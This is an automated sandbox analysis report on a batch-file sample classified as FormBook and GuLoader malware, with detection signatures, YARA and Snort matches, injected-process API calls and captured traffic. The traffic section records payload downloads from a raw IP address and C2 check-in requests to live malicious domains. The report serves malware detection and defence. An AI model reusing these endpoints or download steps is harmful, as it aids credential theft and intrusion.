Windows Analysis Report
PO_La-Tanerie04180240124.bat

Overview

General Information

Sample name: PO_La-Tanerie04180240124.bat
Analysis ID: 1430938
MD5: dd4839ecc1b0a5b2f98415fe36f4e848
SHA1: 20389c69b3069faafc09c4adf7d98b9f36f305f9
SHA256: 7c9bff4d76e487e274fe0f7a323f55d6c74de2a809f1c646a2dbad3417c3229f

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: http://pesterbdd.com/images/Pester.png4 Avira URL Cloud: Label: malware
Source: http://pesterbdd.com/images/Pester.png Avira URL Cloud: Label: malware
Source: http://www.tyaer.com/gnbc/?3rIdN=L9JeOsoYfW7LuiHbEV4XUwbpY14lK3MC8gDNcZo86ZNgoJ0Ky4PaH7DNod07P46PC5yTK57EcxKk26T8ts7dMYkzgYfCCfwx/idEgCEytip/UDtQtUPltR4=&-vl=m8zDpnb8Q0wTDj9 Avira URL Cloud: Label: malware
Source: http://pesterbdd.com/images/Pester.pngXz Avira URL Cloud: Label: malware
Source: www.oyoing.com Virustotal: Detection: 9%
Source: www.tyaer.com Virustotal: Detection: 10%
Source: http://87.121.105.163/Licences.ttf Virustotal: Detection: 7%
Source: http://87.121.105.163/vhhJQWfiJN142.bin Virustotal: Detection: 14%
Source: http://87.121.105.163 Virustotal: Detection: 18%
Source: http://pesterbdd.com/images/Pester.png4 Virustotal: Detection: 10%
Source: http://pesterbdd.com/images/Pester.png Virustotal: Detection: 13%
Source: http://pesterbdd.com/images/Pester.pngXz Virustotal: Detection: 9%
Source: Yara match File source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Binary string: System.Configuration.Install.pdb source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: System.Data.pdb source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: powershell.exe, 0000000A.00000002.20243445512.000000006A10D000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: indows\System.Core.pdbRm source: powershell.exe, 0000000A.00000002.20096165861.0000000008C6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.20096165861.0000000008C58000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.pdb source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: System.Data.ni.pdb source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl@ source: powershell.exe, 0000000A.00000002.20092124595.00000000078C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: ore.pdb source: powershell.exe, 0000000A.00000002.20096165861.0000000008C6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: System.Management.pdb source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: System.Data.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: System.Management.ni.pdb source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 0000000A.00000002.20092124595.00000000078C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdb source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: System.Numerics.pdb source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02ABD1C0 FindFirstFileW,FindNextFileW,FindClose, 15_2_02ABD1C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 4x nop then mov ebx, 00000004h 14_2_06E6179E
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 4x nop then pop ebx 15_2_02AB3070
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 4x nop then xor eax, eax 15_2_02AAAE40
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 4x nop then pop ebx 15_2_02AB306F

Networking

Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50316 -> 47.91.88.207:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50319 -> 172.67.152.117:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50320 -> 172.67.152.117:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50322 -> 172.67.152.117:80
Source: Joe Sandbox View IP Address: 87.121.105.163
Source: Joe Sandbox View IP Address: 47.91.88.207
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: global traffic HTTP traffic detected: GET /Licences.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vhhJQWfiJN142.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /gnbc/?3rIdN=L9JeOsoYfW7LuiHbEV4XUwbpY14lK3MC8gDNcZo86ZNgoJ0Ky4PaH7DNod07P46PC5yTK57EcxKk26T8ts7dMYkzgYfCCfwx/idEgCEytip/UDtQtUPltR4=&-vl=m8zDpnb8Q0wTDj9 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeHost: www.tyaer.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /gnbc/?3rIdN=CFA+HkVxdb5EmOTiyKzJRx18y6HwiaTX//sAjaoe71zU1jru2C8H4zLuCGW9CrkOmabuxLOltM6mSwZ40cUW36eaDQ/OtyT9g3qPq0qmgtUTW0WFBiYRpF0=&-vl=m8zDpnb8Q0wTDj9 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeHost: www.theplays.shopUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Source: unknown DNS traffic detected: queries for: www.tyaer.com
Source: unknown HTTP traffic detected: POST /gnbc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,enContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 202Cache-Control: no-cacheHost: www.theplays.shopOrigin: http://www.theplays.shopReferer: http://www.theplays.shop/gnbc/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 24 Apr 2024 09:57:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B2C9B66440431D77EAAC586823BF5FDFE2BB634217B5550DC29F3FFC500Set-Cookie: _csrf=80c89093c88a4c32d4195643ece835d950e572e10e781462568b16bdb938eaefa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22Y6jq5p23SqM48dU5y16ucWtW9H-p7Hrq%22%3B%7D; path=/; HttpOnly
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 09:58:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TGdQO6pq1G0TCdW2aoD9dlOTDesVWCM%2FMvz3lfDwOn5TCuDZshM4E8zhzaVZyvSCyWXYsihjLbQIL4aEZLoFhuT6jZisHObQxj5BwXu9%2FEGfm9kmOFHHUKUTQ9FPkCRZgjuUVw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87953c9fce98525d-LAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 09:58:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V29H4UtLu8kzzBDg4SXB1%2Bw4pUe0B%2FYRqX3L5oC8Xd9zdvEJBzgoAtTR96jsadXLI8gha5V3EKNt2avuGc1VIml5Jfrjp68V4y149N13zoGe4y2yyhqQuEeZxkVziFwl7UXHyQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87953cb08b9e7d8f-LAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 09:58:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MKm88EOSbBkRGmcQUNXninC3PDBZMRCMC5b6X%2FEK8wQMVzTXO%2FKi7RcoHGs2T3mXp6u43Pf1sU67%2BSmQPqEocS9eOHsmTtjGqHlOtWlSzF4Mh6ObNIpWtsDPNUmVuf7VLLAkTQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87953cc15d922a9f-LAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 09:58:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6mqhCtYPhcKQolffdsxmhPbRVJaIKjXqt6QNl2nfZpoLlD3eGaDWhLygLclMHX0j0rdKRbH65GREoodHcUVyIjeJIodHYTOg8rW%2BExA7WilKJRAG37fMoMOi%2Fo9zw89zYrDjxA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87953cd219a52f7c-LAXalt-svc: h3=":443"; ma=86400
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.20347450981.0000025A24460000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.20347450981.0000025A233DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/Licences.ttf
Source: powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/Licences.ttfpNBl
Source: powershell.exe, 00000006.00000002.20347450981.0000025A244BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.H
Source: powershell.exe, 00000006.00000002.20473581969.0000025A3AAD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000006.00000002.20473581969.0000025A3AAD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.20453370877.0000025A329E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000005EDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20092124595.00000000078B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004E71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000006.00000002.20473581969.0000025A3AAD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp String found in binary or memory: http://www.xmlspy.com)
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22971000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.20084185803.0000000004E71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20092124595.00000000078B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester4
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000006.00000002.20347450981.0000025A23607000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.20453370877.0000025A329E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000005EDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000006.00000002.20473581969.0000025A3AAD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0

E-Banking Fraud

Source: Yara match File source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: amsi32_2316.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3124, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2316, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2814
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 2838
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233334E0 NtCreateMutant,LdrInitializeThunk, 12_2_233334E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332B90 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_23332B90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332BC0 NtQueryInformationToken,LdrInitializeThunk, 12_2_23332BC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332A80 NtClose,LdrInitializeThunk, 12_2_23332A80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332EB0 NtProtectVirtualMemory,LdrInitializeThunk, 12_2_23332EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332D10 NtQuerySystemInformation,LdrInitializeThunk, 12_2_23332D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23334260 NtSetContextThread, 12_2_23334260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23334570 NtSuspendThread, 12_2_23334570
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332B20 NtQueryInformationProcess, 12_2_23332B20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332B10 NtAllocateVirtualMemory, 12_2_23332B10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332B00 NtQueryValueKey, 12_2_23332B00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332B80 NtCreateKey, 12_2_23332B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332BE0 NtQueryVirtualMemory, 12_2_23332BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332A10 NtWriteFile, 12_2_23332A10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332AA0 NtQueryInformationFile, 12_2_23332AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332AC0 NtEnumerateValueKey, 12_2_23332AC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233329F0 NtReadFile, 12_2_233329F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233329D0 NtWaitForSingleObject, 12_2_233329D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233338D0 NtGetContextThread, 12_2_233338D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332F30 NtOpenDirectoryObject, 12_2_23332F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332F00 NtCreateFile, 12_2_23332F00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332FB0 NtSetValueKey, 12_2_23332FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332E00 NtQueueApcThread, 12_2_23332E00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332E50 NtCreateSection, 12_2_23332E50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332E80 NtCreateProcessEx, 12_2_23332E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332ED0 NtResumeThread, 12_2_23332ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332EC0 NtQuerySection, 12_2_23332EC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332D50 NtWriteVirtualMemory, 12_2_23332D50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332DA0 NtReadVirtualMemory, 12_2_23332DA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332DC0 NtAdjustPrivilegesToken, 12_2_23332DC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23333C30 NtOpenProcessToken, 12_2_23333C30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332C30 NtMapViewOfSection, 12_2_23332C30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332C20 NtSetInformationFile, 12_2_23332C20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332C10 NtOpenProcess, 12_2_23332C10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332C50 NtUnmapViewOfSection, 12_2_23332C50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23333C90 NtOpenThread, 12_2_23333C90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332CF0 NtDelayExecution, 12_2_23332CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332CD0 NtEnumerateKey, 12_2_23332CD0
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E642B0 SleepEx,NtResumeThread, 14_2_06E642B0
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E64108 SleepEx,NtCreateSection, 14_2_06E64108
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE34E0 NtCreateMutant,LdrInitializeThunk, 15_2_04AE34E0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE4570 NtSuspendThread,LdrInitializeThunk, 15_2_04AE4570
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE4260 NtSetContextThread,LdrInitializeThunk, 15_2_04AE4260
